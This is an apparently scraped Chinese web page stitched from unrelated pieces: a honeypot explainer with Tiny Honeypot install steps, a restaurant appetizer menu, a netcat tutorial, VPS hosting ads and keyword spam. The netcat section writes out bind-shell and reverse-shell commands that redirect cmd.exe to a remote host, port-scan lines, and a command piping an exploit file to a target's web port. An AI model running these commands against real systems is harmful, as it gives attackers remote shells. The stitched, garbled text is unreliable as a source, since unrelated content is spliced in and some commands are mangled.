Honeypotnc如何使用

Honeypot  时间:2021-05-30  阅读:()

'蜜罐系统是何钟系统

蜜罐(Honeypot)是一种在互联网上运行的计算 机系统。

它是专门为吸引并诱骗那些试图非法闯 入他人计算机系统的人(如电脑黑客)而设计的,蜜 罐系统是一个包含漏洞的诱骗系统,它通过模拟 一个或多个易受攻击的主机,给攻击者提供一个 容易攻击的目标。

由于蜜罐并没有向外界提供真 正有价值的服务,因此所有对蜜罐尝试都被视为 可疑的。

蜜罐的另一个用途是拖延攻击者对真正 目标的攻击,让攻击者在蜜罐上浪费时间。

简单 点一说:蜜罐就是诱捕攻击者的一个陷阱。

Honeypot的特点 (1) 它不是一个单一的系统,而是一个网络,是 一种高度相 互作用的Honeypot ,装有多个系统和应用软 件。

(2) 所有放置在 内的系统都是标准 的产品系统, 即真实的系统和应用软件都不是仿效的。

Honeypot分类 可以有多种方法对其进行分类:根据蜜罐 的设计目的不同,可以分为产品型蜜罐和 研究型蜜罐二种;根据蜜罐的工作方式不 同可以分为牺牲型蜜罐和外观型蜜罐二 种。

蜜罐的主要技术 蜜罐的主要技术有网络欺骗,端口重定向,报警,数据控制 和数据捕获等。

1.网络欺骗技术: 为了使蜜罐对入侵者更有吸引力,就要采用各种欺骗手段。

例如在欺骗主机上模拟一些操作系统一些网络攻击者最"喜 欢"的端口和各种认为有入侵可能的漏洞。

2.端口重定向技术: 端口重定向技术,可以在工作系统中模拟一个非工作服务。

例如我们正常使用WEB服务(80),而用TELNET(23)和FTP (21)重定向到蜜罐系统中,而实际上这两个服务是没有开 启的,而攻击者扫描时则发现这两个端口是开放的,而实际 上两个端口是HONEYPOT虚拟出来的,对其服务器而不产生危 害性。

3.攻击(入侵)报警和数据控制 蜜罐系统本身就可以模拟成一个操作系统,我们可以把其 本身设定成为易攻破的一台主机,也就是开放一些端口和 弱口令之类的,并设定出相应的回应程序,如在LINUX中的 SHELL,和FTP程序,当攻击者"入侵"进入系统(这里所 指是HONEYPOT虚拟出来的系统)后,当进入后就相当于攻 击者进入一个设定"陷阱",那么攻击者所做一切都在其 监视之中:如TELNET密码暴力破解,添加新用户,权限提升, 删除添加文件,还可以给入侵者一个网络连接让其可以进 行网络传输,并可以作为跳板 4.数据的捕获技术 在攻击者入侵的同时,蜜罐系统将记录攻击者输入输出信 息,键盘记录信息,屏幕信息,以及攻击者曾使用过的工 具,并分析攻击者所要进行的下一步。

捕获的数据不能放 在加有HONEYPOT的主机上,因为有可能被攻击者发现,从 而使其觉察到这是一个"陷阱"而提早退出 典型的Sebek部署。

客户端模块安装在蜜罐(蓝 色)里,蜜罐里攻击者行为被捕获后发送到网络 (对攻击者是不可见的)并且由Honey wall网关被 动的收集。

Tiny Honeypot介绍 Tiny Honeypot 是由e Bakos最初编写,Tiny Honeypot最出色的一点就是系 统容易受到攻击,不用担心电脑黑客和电脑高手们不能入侵,一般会成功的,Tiny Honeypot具有很好的收集那些坏家伙(入侵者) 入侵的信息和信息保存机制。

Tiny Honeypot安装: 首先要下载thp-0.4.6.tar.gz程序然后执行下列命令: cd /usr/local #切换目录到/usr/local zcat thp-0.4.6.tar.gz | tar -xvf - #解压gz文件 ln -s thp-0.4.6.tar.gz thp #建立软链接 mkdir /var/log/hpot #新建目录 chown nobody:nobody /var/log/hpot #设定目录权限 chmod 700 /var/log/hpot #修改查看日志权限 cp ./thp/d.d/* /etc/d.d edit d files to change to :"disable = no" #修改参数(后面详解) #make any path & preferences adjustements in thp.conf & iptables.rules ./thp/iptables.rules #修改规则 /etc/rc.d/init.d/portmap start #启动portmap pmap_set < ./thp/fakerpc /etc/rc.d/init.d/d start #启动d 配置过程: 1 .建议在ROOT用户上进行安装,"chmod 700 /var/log/hpot"修改 访问日志的权限,使只有ROOT才能对其进行访问 2.edit d files to change to :"disable = no" 3../thp/iptables.rules 编译iptables.rules访问规则,注意修改其 ip_forward环境变量为"". 0 4.对honeypot进行网络配置 对 Honeypot进行网络及环境变量配置,如IP地址, 允许正常使用的端口,Honeypot重定向的端口以久虚拟的 网络服务,如正常使用80端口进行WWW服务,21,23端口 进行虚拟,Honeypot可以虚拟出许多的服务,如FTP服 务,WWW服务,远程SHELL,SMTP服务等,在这里就不 一一细说了。

配置实例

Appetizers是什么意思?

头盘餐前小品Appetizers 1.各式刺身拼Sashimi Platter 2.锅贴Pot Sticker 3.辣汁脆炸鸡腿Fried Chicken Legs (Spicy Hot) 4.鸡沙律Chicken Salad 5.酥炸大虾Fried Prawns 6.酥炸生豪Fried Oysters 7.酥炸鲜鱿Fried Squid 8.海哲分蹄Smoked Jelly Fish 9.五香牛展Special Beef 10.白云凤爪Chicken Leg 11.琥珀合桃House Special Honey Walnuts 12.脆皮春卷Spring Rolls 13.蜜汁叉烧B.B.Q. Pork

nc如何使用

一、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 G num source-routing pointer: 4, 8, 12, … -I secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -t 以的形式应答 -u UDP模式 -v 详细输出——用多个-v可得到更详细的内容 -z 将输入输出关掉——用于扫描时 -w secs timeout的时间 二. 它的简单使用方法 1.nc -l -p 80 监听80端口 2.nc -l -p 80 >c:log.dat 监听80端口,并把信息记录到log.dat 3.nc -v -l -p 80 监听80端口,并显示端口信息 4.nc -l -p 80 -t -e cmd.exe 监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以的形式应答 5.nc -v ip port 扫描某ip的某个端口 6.nc -v -z ip port-port 扫描某ip的某端口到某端口 7.nc -v -z -u ip port-port 扫描某ip的某udp端口到某udp端口 7.扫描远程主机 nc -nvv -w2 -z 192.168.x.x 80-445 扫描192.168.x.x的TCP 80到TCP445的所有端口 8.REMOTE主机绑定SHELL nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 9.REMOTE主机绑定SHELL并反向连接 nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 三.使用的例子 1. 计算机192.168.0.1运行:nc -v -n -p 99 计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99 这样我们就获得了192.168.0.8的一个shell 2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99 计算机192.168.0.8运行:nc -v -l -p 99 >d:sc.exe 四.高级用法: 1.作攻击程序用 格式1:type c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt 连接到192.168.x.x的80端口,并在其管道中发送’c:exploit.txt’的内容(两种格式确有相同的效果, 真是有异曲同工之妙) 2.作蜜罐用 nc -L -p 80 > c:log.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:log.txt’中,如果把’>’ 改为’>>’即可以追加日志 3.作蜜罐用 nc -L -p 80 < c:honeypot.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,并把’c:honeypot.txt’的内容’送’入其 管道中

10GBIZ(月$2.36 ), 香港和洛杉矶CN2 GIA

10GBIZ服务商经常有看到隔壁的一些博客分享内容,我翻看网站看之前有记录过一篇,只不过由于服务商是2020年新成立的所以分享内容比较谨慎。这不至今已经有将近两年的服务商而且云服务产品也比较丰富,目前有看到10GBIZ服务商有提供香港、美国洛杉矶等多机房的云服务器、独立服务器和站群服务器。其中比较吸引到我们用户的是亚洲节点的包括香港、日本等七星级网络服务。具体我们看看相关的配置和线路产品。第一、香...

天上云:香港大带宽物理机服务器572元;20Mbps带宽!三网CN2线路

天上云服务器怎么样?天上云是国人商家,成都天上云网络科技有限公司,专注于香港、美国海外云服务器的产品,有多年的运维维护经验。世界这么大 靠谱最重,我们7*24H为您提供服务,贴心售后服务,安心、省事儿、稳定、靠谱。目前,天上云香港大带宽物理机服务器572元;20Mbps带宽!三网CN2线路,香港沙田数据中心!点击进入:天上云官方网站地址香港沙田数据中心!线路说明 :去程中国电信CN2 +中国联通+...

Budgetvm12核心 16G 500 GB SSD 或者 2 TB SATA 10GB  20 TB  99美金

Budgetvm(原EZ机房),2005年成立的美国老品牌机房,主打美国4个机房(洛杉矶、芝加哥、达拉斯、迈阿密)和日本东京机房的独立服务器和VPS业务,而且不限制流量,默认提供免费的1800G DDoS防御服务,支持IPv6和IPMI,多种免费中文操作系统可供选择,独立服务器主打大硬盘,多硬盘,大内存,用户可以在后台自行安装系统等管理操作!内存可定制升级到1536G,多块硬盘随时加,14TBSA...

Honeypot为你推荐
李智慧李智慧和李东健的电影有哪些?excel计算公式请教在excel中如何用求和公式草莓派怎么做草莓派?Honeypotfeedback 歌词翻译应用雷达雷达是干什么用的?数据监测监测局是做什么的?y码男生衣服M L XL分别是什么码?视频技术怎么做视频?vga接口定义vga线有几种人肉搜索引擎人肉搜索引擎是干什么的?
美国虚拟主机购买 沈阳虚拟主机 如何申请域名 域名解析文件 免费申请域名和空间 中国域名网 企业主机 美元争夺战 青果网 私有云存储 刀片式服务器 东莞主机托管 杭州电信宽带优惠 稳定空间 godaddy空间 葫芦机 winserver2008下载 ddos攻击软件 主机游戏 电脑主机声音大 更多